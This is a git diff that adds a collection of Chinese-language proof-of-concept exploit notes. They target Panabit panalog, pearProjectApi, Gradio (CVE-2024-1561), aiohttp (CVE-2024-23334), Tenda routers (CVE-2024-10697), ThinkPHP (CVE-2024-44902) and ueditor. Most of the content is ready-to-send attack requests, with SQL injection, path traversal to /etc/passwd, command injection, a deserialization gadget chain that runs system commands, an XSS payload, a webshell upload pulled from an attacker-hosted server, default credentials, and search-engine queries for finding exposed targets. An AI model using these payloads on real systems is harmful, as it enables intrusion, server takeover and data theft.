pobjejsh.txt +``` + +![1708524892745-3b5bf667-ecd6-4a9b-bbce-5c21566165de.png](./img/PDxyT-yAQSiNXykj/1708524892745-3b5bf667-ecd6-4a9b-bbce-5c21566165de-715574.png) + +获取命令执行结果 + +```java +GET /pobjejsh.txt HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 +Connection: close +Content-Type: text/plain +Accept-Encoding: gzip, deflate +``` + +![1708524929552-5534bed2-5da0-4c33-a551-21bc90dbe0ec.png](./img/PDxyT-yAQSiNXykj/1708524929552-5534bed2-5da0-4c33-a551-21bc90dbe0ec-650538.png)[panabit-mailcious-down-fornode-远程命令执行.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222233874-8275a922-bf36-45a6-b083-4536ea247db0.yaml) + + + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qkhnzs3bu0s8zxxn> \ No newline at end of file diff --git a/panabit日志审计系统sprog_deletevent存在SQL注入漏洞.md b/panabit日志审计系统sprog_deletevent存在SQL注入漏洞.md new file mode 100644 index 0000000..781cc6e --- /dev/null +++ b/panabit日志审计系统sprog_deletevent存在SQL注入漏洞.md 
@@ -0,0 +1,57 @@ +# panabit日志审计系统sprog_deletevent存在SQL注入漏洞 + +# 一、漏洞简介 +panalog为北京派网软件有限公司,一款流量分析,日志分析管理的一款软件。panalog日志审计系统sprog_deletevent存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ Panabit panalog + +# 三、资产测绘 ++ hunter`app.name="Panabit 日志系统"` ++ 特征 + +![1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f.png](./img/NBje5ZQnkKxGETyn/1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f-759328.png) + +# 四、漏洞复现 +```java +GET /Maintain/sprog_deletevent.php?openid=1&id=1%20or%20updatexml(1,concat(0x7e,(select+user())),0)&cloudip=1 HTTP/1.1 +Host: {hostname} +Cookie: PHPSESSID=h5inhsqh9heas1lovb1f5kd355 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1702202129097-d75320e4-8326-46f1-85ac-183a93a23400.png](./img/NBje5ZQnkKxGETyn/1702202129097-d75320e4-8326-46f1-85ac-183a93a23400-648104.png) + +```java +GET /Maintain/sprog_deletevent.php?openid=1&id=1&cloudip=1 HTTP/1.1 +Host: {hostname} +Cookie: PHPSESSID=h5inhsqh9heas1lovb1f5kd355 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1702203492043-58bc7c32-9f32-4a11-9ef5-5ba8e08312da.png](./img/NBje5ZQnkKxGETyn/1702203492043-58bc7c32-9f32-4a11-9ef5-5ba8e08312da-650390.png) + + + +> 更新: 2024-02-29 
23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bsile5w0tmgnvcvi> \ No newline at end of file diff --git a/panabit日志审计系统任意用户创建漏洞和后台命令执行.md b/panabit日志审计系统任意用户创建漏洞和后台命令执行.md new file mode 100644 index 0000000..9093313 --- /dev/null +++ b/panabit日志审计系统任意用户创建漏洞和后台命令执行.md 
@@ -0,0 +1,57 @@ +# panabit日志审计系统任意用户创建漏洞和后台命令执行 + +# 一、漏洞简介 +panalog为北京派网软件有限公司,一款流量分析,日志分析管理的一款软件。存在任意用户创建漏洞和后台命令执行漏洞,可先通过任意用户创建,然后进行后台命令执行,获取服务器权限。 + +# 二、影响版本 ++ Panabit panalog + +# 三、资产测绘 ++ hunter`app.name="Panabit 日志系统"` ++ 特征 + +![1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f.png](./img/R_hiEBQ2rdg129pi/1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f-738731.png) + +# 四、漏洞复现 +访问连接出现如下页面表示可能存在漏洞 + +```plain +/singleuser_action.php +``` + +![1699192303959-b1514c8f-87a3-43de-bcb8-8eaf81585fe8.png](./img/R_hiEBQ2rdg129pi/1699192303959-b1514c8f-87a3-43de-bcb8-8eaf81585fe8-569687.png) + +通过POC添加用户 + +```plain +POST /singleuser_action.php HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: PHPSESSID=4dkc7q5hu7lkdlsfm5a0tcirn6 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Dnt: 1 +Upgrade-Insecure-Requests: 1 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 578 + + +{ "syncInfo": { "user": { "userId": "110", "userName": "110", "employeeId": "110", "departmentId": "110", "departmentName": "110", "coporationId": "110", "corporationName": "110", "userSex": "1", "userDuty": "110", "userBirthday": "110", "userPost": "110", "userPostCode": "110", "userAlias": "110", "userRank": "110", "userPhone": "110", "userHomeAddress": "110", "userMobilePhone": "110", "userMailAddress": "110", "userMSN": "110", "userNt": "110", "userCA": "110", "userPwd": "110", "userClass": "110", "parentId": "110", "bxlx": "110" },"operationType": "ADD_USER" } } +``` + +![1699192359593-ce854b7d-6a70-4afb-9b8d-8ec24a96b220.png](./img/R_hiEBQ2rdg129pi/1699192359593-ce854b7d-6a70-4afb-9b8d-8ec24a96b220-349214.png) + +使用添加的账户`110/110` + 
+![1699192394802-63091860-1fae-479d-bece-9557ffa15489.png](./img/R_hiEBQ2rdg129pi/1699192394802-63091860-1fae-479d-bece-9557ffa15489-628593.png) + +执行命令 + +![1699192639614-2727f7d1-d406-4477-a921-e6d67ca480f9.png](./img/R_hiEBQ2rdg129pi/1699192639614-2727f7d1-d406-4477-a921-e6d67ca480f9-644917.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lr43i377pvqttwpn> \ No newline at end of file diff --git a/panabit日志审计系统存在弱口令漏洞.md b/panabit日志审计系统存在弱口令漏洞.md new file mode 100644 index 0000000..4783bab --- /dev/null +++ b/panabit日志审计系统存在弱口令漏洞.md @@ -0,0 +1,25 @@ +# panabit日志审计系统存在弱口令漏洞 + +# 一、漏洞简介 +panalog为北京派网软件有限公司,一款流量分析,日志分析管理的一款软件。panabit日志审计系统存在弱口令漏洞,攻击者可通过该漏洞获取应用系统权限。 + +# 二、影响版本 ++ Panabit panalog + +# 三、资产测绘 ++ hunter`app.name="Panabit 日志系统"` ++ 特征 + +![1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f.png](./img/xmUcktviOfYVOeI0/1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f-289266.png) + +# 四、漏洞复现 +```plain +admin/panabit +``` + +![1702873135426-bdc33bdf-9af0-4fe3-bb19-3ebed79c5c35.png](./img/xmUcktviOfYVOeI0/1702873135426-bdc33bdf-9af0-4fe3-bb19-3ebed79c5c35-056323.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wro15wwfur3dpy3r> \ No newline at end of file diff --git a/pearProjectApi系统接口organizationCode存在SQL注入漏洞.md b/pearProjectApi系统接口organizationCode存在SQL注入漏洞.md new file mode 100644 index 0000000..35171ad --- /dev/null +++ b/pearProjectApi系统接口organizationCode存在SQL注入漏洞.md 
@@ -0,0 +1,31 @@ +# pearProjectApi系统接口organizationCode存在SQL注入漏洞 + +## poc + +```javascript +POST /index.php/project/project/selfList HTTP/2 +Host: +Cookie: se0d06741=5rkiv0sqvn1otra27va1jlfgfo +Content-Length: 168 +Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" +Organizationcode: 6v7be19pwman2fird04gqu53 +Sec-Ch-Ua-Mobile: ?0 +Authorization: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIiLCJhdWQiOiIiLCJpYXQiOjE2NzY5NDU0MTAsIm5iZiI6MTY3Njk0NTQxMCwiZGF0YSI6eyJjb2RlIjoiNnY3YmUxOXB3bWFuMmZpcmQwNGdxdTUzIn0sInNjb3BlcyI6ImFjY2VzcyIsImV4cCI6MTY3NzU1MDIxMH0.G18ME7UI0EHAxaTSV751smgNfETb1Q0O0e9mv-6L42I +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: application/json, text/plain, / +Sec-Ch-Ua-Platform: "macOS" +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 + +delete=0&all=0&page=1&pageSize=20&organizationCode=6v7be19pwman2fird04gqu53'+and+updatexml(1,concat(0x7e,(select+user()),0x7e),1)%23&memberCode=6v7be19pwman2fird04gqu53 +``` + +![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501241002368.png) + +## 漏洞来源 + +- https://github.com/a54552239/pearProjectApi/issues/31 diff --git a/pearProjectApi系统接口projectCode存在SQL注入漏洞.md b/pearProjectApi系统接口projectCode存在SQL注入漏洞.md new file mode 100644 index 0000000..c586654 --- /dev/null +++ b/pearProjectApi系统接口projectCode存在SQL注入漏洞.md 
@@ -0,0 +1,31 @@ +# pearProjectApi系统接口projectCode存在SQL注入漏洞 + +## poc + +```javascript +POST /index.php/project/project/getLogBySelfProject HTTP/2 +Host: +Cookie: se0d06741=5rkiv0sqvn1otra27va1jlfgfo +Content-Length: 100 +Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" +Organizationcode: 6v7be19pwman2fird04gqu53 +Sec-Ch-Ua-Mobile: ?0 +Authorization: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIiLCJhdWQiOiIiLCJpYXQiOjE2NzY5NDU0MTAsIm5iZiI6MTY3Njk0NTQxMCwiZGF0YSI6eyJjb2RlIjoiNnY3YmUxOXB3bWFuMmZpcmQwNGdxdTUzIn0sInNjb3BlcyI6ImFjY2VzcyIsImV4cCI6MTY3NzU1MDIxMH0.G18ME7UI0EHAxaTSV751smgNfETb1Q0O0e9mv-6L42I +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: application/json, text/plain, / +Sec-Ch-Ua-Platform: "macOS" +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 + +page=1&pageSize=123&projectCode=121312312312'+or+updatexml(1,concat(0x7e,(select+user()),0x7e),1)%23 +``` + +![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501241001031.png) + +## 漏洞来源 + +- https://github.com/a54552239/pearProjectApi/issues/32 \ No newline at end of file diff --git a/pythonGradio插件存在任意文件读取漏洞(CVE-2024-1561).md b/pythonGradio插件存在任意文件读取漏洞(CVE-2024-1561).md new file mode 100644 index 0000000..e1261c0 --- /dev/null +++ b/pythonGradio插件存在任意文件读取漏洞(CVE-2024-1561).md 
@@ -0,0 +1,44 @@ +# python Gradio插件存在任意文件读取漏洞(CVE-2024-1561) + +# 一、漏洞简介 +Gradio是一个开源的Python库,用于创建机器学习模型的交互式界面。它使得展示和测试模型变得简单快捷,无需深入了解复杂的前端技术。广泛应用于数据科学、教育、研究和软件开发领域,尤其适合于快速原型设计、模型验证、演示和教学。Gradio的/component_server接口不正确地允许使用攻击者控制的参数调用`Component`类的任何方法。具体来说,通过利用`Block`类的`move_resource_to_block_cache()`方法,攻击者可以将文件系统上的任何文件复制到临时目录,然后检索它。该漏洞允许未经授权的本地文件读取访问,尤其是当应用程序通过`launch(share=True)`暴露到互联网时,从而允许远程攻击者读取主机机器上的文件。此外,托管在`huggingface.co`上的gradio应用也受到影响,可能导致敏感信息,如存储在环境变量中的API密钥和凭据的泄露。 + +# 二、影响版本 ++ Gradio + +# 三、资产测绘 ++ fofa`body="__gradio_mode__"` + +![1716302666272-e9be2ee3-0f10-483a-a8fa-f8f167765e0b.png](./img/nhqHGDrOPHKgDp7N/1716302666272-e9be2ee3-0f10-483a-a8fa-f8f167765e0b-158980.png) + +# 四、漏洞复现 +首席获取components的id值 + +```plain +GET /config HTTP/1.1 +Host: 101.35.228.120 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 +``` + +![1716302792557-a7a11abb-0428-4661-85d9-7ce32a833f24.png](./img/nhqHGDrOPHKgDp7N/1716302792557-a7a11abb-0428-4661-85d9-7ce32a833f24-678576.png) + +携带id值将/etc/passwd文件的内容写入临时文件 + +![1716302852140-3adae7b1-e986-40c4-afd1-3cbd5ff25060.png](./img/nhqHGDrOPHKgDp7N/1716302852140-3adae7b1-e986-40c4-afd1-3cbd5ff25060-659510.png) + +读取文件 + +```plain +GET /file=/tmp/gradio/4985ef451ed671433e69560a0edc00761e44efab/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3 +Connection: close +Accept-Encoding: gzip +``` + +![1716302894039-110b1ea7-9212-458a-9672-2ea39a58508a.png](./img/nhqHGDrOPHKgDp7N/1716302894039-110b1ea7-9212-458a-9672-2ea39a58508a-950250.png) + + + +> 更新: 2024-09-05 23:27:24 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sh67wp3qcrzx75qv> \ No newline at end of file diff --git a/pythonaiohttp插件存在目录遍历漏洞(CVE-2024-23334).md b/pythonaiohttp插件存在目录遍历漏洞(CVE-2024-23334).md new file mode 100644 index 0000000..262790f --- /dev/null +++ b/pythonaiohttp插件存在目录遍历漏洞(CVE-2024-23334).md 
@@ -0,0 +1,32 @@ +# python aiohttp插件存在目录遍历漏洞(CVE-2024-23334) + +# 一、漏洞简介 +aiohttp是一个用于异步网络编程的Python库,支持客户端和服务器端的网络通信。它利用Python的asyncio库来实现异步IO操作,这意味着它可以处理大量并发网络连接,而不会导致线程阻塞或性能下降。aiohttp常用于需要高性能网络通信的应用程序,如高频交易平台、大规模并发API服务等。aiohttp 存在目录遍历漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +# 二、影响版本 ++ aiohttp + +# 三、资产测绘 ++ fofa`title=="ComfyUI""` ++ 特征 + +![1715938367206-7b415001-96a1-4753-b2d7-70e7f087045c.png](./img/SDWMxOF8-pVDuhg2/1715938367206-7b415001-96a1-4753-b2d7-70e7f087045c-685432.png)![1715938382417-9902ed78-678c-48c6-afd7-7e97a699c1e7.png](./img/SDWMxOF8-pVDuhg2/1715938382417-9902ed78-678c-48c6-afd7-7e97a699c1e7-373275.png) + +# 四、漏洞复现 +```plain +GET /static/../../../../../etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 +Connection: close +Accept: */* +Accept-Language: en +Accept-Encoding: gzip + +``` + +![1715938400651-ce4a7892-ff07-45c6-a92a-57220795bfa2.png](./img/SDWMxOF8-pVDuhg2/1715938400651-ce4a7892-ff07-45c6-a92a-57220795bfa2-977848.png) + + + +> 更新: 2024-09-05 23:27:24 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zaatbgfawgop0f6e> \ No newline at end of file diff --git a/tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697).md b/tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697).md new file mode 100644 index 0000000..dd1347f --- /dev/null +++ b/tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697).md 
@@ -0,0 +1,30 @@ +# tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697) + +## fofa + +```javascript +title="Tenda | LOGIN" && country="CN" +``` + +## poc + +```javascript +GET /goform/WriteFacMac?mac=`ls%20%3E/webroot/1.txt` HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 +Cache-Control: max-age=0 +Connection: keep-alive +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0 +``` + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501061038061.png) + + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501061038043.png) + +## 漏洞来源 + +- https://nvd.nist.gov/vuln/detail/CVE-2024-10697 \ No newline at end of file diff --git a/thinkphp最新CVE-2024-44902反序列化漏洞.md b/thinkphp最新CVE-2024-44902反序列化漏洞.md new file mode 100644 index 0000000..3309c97 --- /dev/null +++ b/thinkphp最新CVE-2024-44902反序列化漏洞.md 
@@ -0,0 +1,103 @@ +# thinkphp最新CVE-2024-44902反序列化漏洞 + +Thinkphp v6.1.3 至 v8.0.4 中存在反序列化漏洞,允许攻击者执行任意代码。 + +## demo + +```php +<?php + +namespace app\controller; + +use app\BaseController; + +class Index extends BaseController +{ + public function index() + { + unserialize($_GET['x']); + return '<style>*{ padding: 0; margin: 0; }</style><iframe src="https://www.thinkphp.cn/welcome?version=' . \think\facade\App::version() . '" width="100%" height="100%" frameborder="0" scrolling="auto"></iframe>'; + } + + public function hello($name = 'ThinkPHP8') + { + return 'hello,' . $name; + } +} + +``` + +## poc + +```php +<?php +namespace think\cache\driver; +use think\model\Pivot; +class Memcached{ + protected $options=[]; + function __construct() + { + $this->options["username"]=new Pivot(); + } +} + +namespace think\model; +use think\model; +class Pivot extends Model +{ + +} + +namespace think; +abstract class Model{ + private $data = []; + private $withAttr = []; + protected $json = []; + protected $jsonAssoc = true; + function __construct() + { + $this->data["fru1ts"]=["whoami"]; + $this->withAttr["fru1ts"]=["system"]; + $this->json=["fru1ts"]; + } +} + +namespace think\route; +use think\DbManager; +class ResourceRegister +{ + protected $registered = false; + protected $resource; + function __construct() + { + $this->registered=false; + $this->resource=new DbManager(); + } +} +namespace think; +use think\model\Pivot; +class DbManager +{ + protected $instance = []; + protected $config = []; + function __construct() + { + $this->config["connections"]=["getRule"=>["type"=>"\\think\\cache\\driver\\Memcached","username"=>new Pivot()]]; + $this->config["default"]="getRule"; + } +} + +use think\route\ResourceRegister; +$r=new ResourceRegister(); +echo urlencode(serialize($r)); + +``` + +![image-20240916205334112](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409162053192.png) + + + +## 漏洞来源 + +- https://github.com/fru1ts/CVE-2024-44902 +- 
https://xz.aliyun.com/t/15582 \ No newline at end of file diff --git a/ueditor存在SSRF漏洞.md b/ueditor存在SSRF漏洞.md new file mode 100644 index 0000000..57dc288 --- /dev/null +++ b/ueditor存在SSRF漏洞.md @@ -0,0 +1,66 @@ +# ueditor存在SSRF漏洞 + +### 一、漏洞描述 +ueditor存在SSRF漏洞 + +### 二、影响版本 +![1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22.png](./img/f5KIX_0DKetAE9TO/1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22-874641.png) + +### 三、漏洞复现 +Ueditor路径: + +```plain +/ueditor/ +/ueditor-1.4.3.3/net/ +/ueditor1_4_3_3-utf8-net/utf8-net/ +/utf8-net/ +``` + +查看版本: + +```plain +/ueditor/ueditor.all.js +``` + +SSRF路径 + +```plain +/jsp/controller.jsp?action=catchimage&source[]= +/jsp/getRemoteImage.jsp?upfile= +/php/controller.php?action=catchimage&source[]= +``` + +PHP版本: + +```plain +/ueditor/php/controller.php?action=catchimage&source[]=x.x.x +``` + +![1724055281930-a207d66d-0a8b-4a8e-86df-2bc1314aaac4.png](./img/f5KIX_0DKetAE9TO/1724055281930-a207d66d-0a8b-4a8e-86df-2bc1314aaac4-071913.png) + +JSP版本: + +```plain +POST /ueditor/jsp/controller.jsp?action=uploadfile&encode=utf-8 HTTP/1.1 +Host: +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynJAiy5Qly8XpmZmQ +Content-Length: 323 + + +------WebKitFormBoundarynJAiy5Qly8XpmZmQ +Content-Disposition: form-data; name="upfile"; filename="1.xml" +Content-Type: image/png + +<html> +<head></head> +<body> +<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> +</body> +</html> +------WebKitFormBoundarynJAiy5Qly8XpmZmQ-- +``` + + + +> 更新: 2024-09-05 23:24:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nvizlic3zcdfd5rg> \ No newline at end of file diff --git a/ueditor存在XSS漏洞.md b/ueditor存在XSS漏洞.md new file mode 100644 index 0000000..339b0f4 --- /dev/null +++ b/ueditor存在XSS漏洞.md 
@@ -0,0 +1,83 @@ +# ueditor存在XSS漏洞 + +### 一、漏洞描述 +ueditor存在XSS漏洞 + +### 二、影响版本 +![1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22.png](./img/35L9MfrjXp4PhD_k/1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22-134145.png) + +### 三、漏洞复现 +Ueditor路径: + +```plain +/ueditor/ +/ueditor-1.4.3.3/net/ +/ueditor1_4_3_3-utf8-net/utf8-net/ +/utf8-net/ +``` + +查看版本: + +```plain +/ueditor/ueditor.all.js +``` + +首先点击上传附件,通过burp拦截,修改上传内容 + +![1724048797908-50f299b7-99a0-4cab-8ede-ea98be75892d.png](./img/35L9MfrjXp4PhD_k/1724048797908-50f299b7-99a0-4cab-8ede-ea98be75892d-144688.png) + +```plain +POST /ueditor/php/controller.php?action=uploadfile&encode=utf-8 HTTP/1.1 +Host: +Content-Length: 886 +X_Requested_With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNHZorABX70DBbzax +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundaryNHZorABX70DBbzax +Content-Disposition: form-data; name="id" + +WU_FILE_0 +------WebKitFormBoundaryNHZorABX70DBbzax +Content-Disposition: form-data; name="name" + +phphello.jpg +------WebKitFormBoundaryNHZorABX70DBbzax +Content-Disposition: form-data; name="type" + +image/jpeg +------WebKitFormBoundaryNHZorABX70DBbzax +Content-Disposition: form-data; name="lastModifiedDate" + +Tue May 28 2024 11:33:15 GMT+0800 (香港标准时间) +------WebKitFormBoundaryNHZorABX70DBbzax +Content-Disposition: form-data; name="size" + +34 +------WebKitFormBoundaryNHZorABX70DBbzax +Content-Disposition: form-data; name="upfile"; filename="phphello.xml" +Content-Type: image/jpeg + +<html> +<head></head> +<body> +<something:script xmlns:something="http://www.w3.org/1999/xhtml"> +alert(1); +</something:script> +</body> +</html> +------WebKitFormBoundaryNHZorABX70DBbzax-- +``` + 
+![1724076778474-6a6797d2-45dc-4bc3-897f-c16c48fc61e6.png](./img/35L9MfrjXp4PhD_k/1724076778474-6a6797d2-45dc-4bc3-897f-c16c48fc61e6-816298.png) + +![1724055830613-310f0ec5-83c7-490b-ac93-5b1cd5c9a244.png](./img/35L9MfrjXp4PhD_k/1724055830613-310f0ec5-83c7-490b-ac93-5b1cd5c9a244-554733.png) + + + +> 更新: 2024-09-05 23:24:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fn98g15xv4wqohvy> \ No newline at end of file diff --git a/ueditor存在任意文件上传漏洞(ASP).md b/ueditor存在任意文件上传漏洞(ASP).md new file mode 100644 index 0000000..7fdd1cb --- /dev/null +++ b/ueditor存在任意文件上传漏洞(ASP).md 
@@ -0,0 +1,71 @@ +# ueditor存在任意文件上传漏洞(ASP) + +### 一、漏洞描述 +ueditor存在任意文件上传漏洞 + +### 二、影响版本 +![1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22.png](./img/EWfoqq_KAC_e407D/1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22-254218.png) + +### 三、漏洞复现 +Ueditor路径: + +```plain +/ueditor/ +/ueditor-1.4.3.3/net/ +/ueditor1_4_3_3-utf8-net/utf8-net/ +/utf8-net/ +``` + +将下面内容保存为1.png,上传至vps,开启一个http服务 + +```plain +<% @ webhandler language="C#" class="AverageHandler" %> + +using System; +using System.Web; + +public class AverageHandler : IHttpHandler +{ +public bool IsReusable +{ get { return true; } } +public void ProcessRequest(HttpContext ctx) +{ +ctx.Response.Write("hello"); +} +} +``` + +```plain +python3 -m http.server 7788 +``` + +![1720728231495-e068f2bf-373c-447c-8d8a-150d25672803.png](./img/EWfoqq_KAC_e407D/1720728231495-e068f2bf-373c-447c-8d8a-150d25672803-580779.png) + +发送如下请求包 + +```plain +POST /ueditor/net/controller.ashx?action=catchimage HTTP/1.1 +Host: +Cookie: ASP.NET_SessionId=0mw04qyo4jalkcgevkbdkotv; __RequestVerificationToken=TNLqbzboAbqK2T54GItDL80FA6wOaHCxRbAZAQut2sPldVD0A-AH6sGP2qalhJHbi3hWsr5xFm6876Ry9qflBN0XCyPKxxbxW3LkvPnuK7k1; .AspNet.UCApplicationCookie140400=soA1FErOUkdJQBpnPjyHZHzf2PluHG15CUYnRyqYd1zFQnAZlO2sBfAejgbJrZSp4DlToc1x83M-4FIjJ_9tUAzdhNX4CFrSWMX-Ei0swS4fwQbhx3qUwf1O_2NLM-1GPIqfeobbuEUTDJLkUHAl8QnJ5hHYlVW8l5lAPcPXhC6SgtQ16CyZdkjyA4Ze2EXeZhxnXoaL5MoUPknVb8fifAf707edXAl9C5m1oHr--G0JEXENSsTO5v0XthLL2eKUJMvV-dT4zF9v4P_6yNgNfEYFrxRXOECifw6lG3RHiqd61gHGotFovOTA7gvEvwQKlXjFq773nrkqOH8raEVObyvY8NYy9o8MFx1ugGLvnLMhi_4YblQ62Sf7mR2X8clwCJFEVEeTncPNXHi9c4HAX9b0iOIQ_JVmbWdkl-ZJar59F9eonUySWn5eKSMAhu96EWxGOb33jpmqmVw4j-RDX0O7qB0hsBLasTJHnOJsqlgiQR62SzFciYnB-wdnyu1V +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 17 
+ +source[]=http://x:7788/1.png?.ashx +``` + +![1720728261799-9905053c-1573-4008-8068-be3cbb0032a0.png](./img/EWfoqq_KAC_e407D/1720728261799-9905053c-1573-4008-8068-be3cbb0032a0-485515.png) + +```plain +/ueditor/net/upload/image/20240712/6385635362820339411030114.ashx +``` + +![1720728287383-40ccdb4e-9c26-4d58-8080-637f358a5243.png](./img/EWfoqq_KAC_e407D/1720728287383-40ccdb4e-9c26-4d58-8080-637f358a5243-565362.png) + + + +> 更新: 2024-09-05 23:24:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tkcf54qe88wyd3z2> \ No newline at end of file diff --git a/unitalk存在任意用户删除漏洞.md b/unitalk存在任意用户删除漏洞.md new file mode 100644 index 0000000..17c99aa --- /dev/null +++ b/unitalk存在任意用户删除漏洞.md 
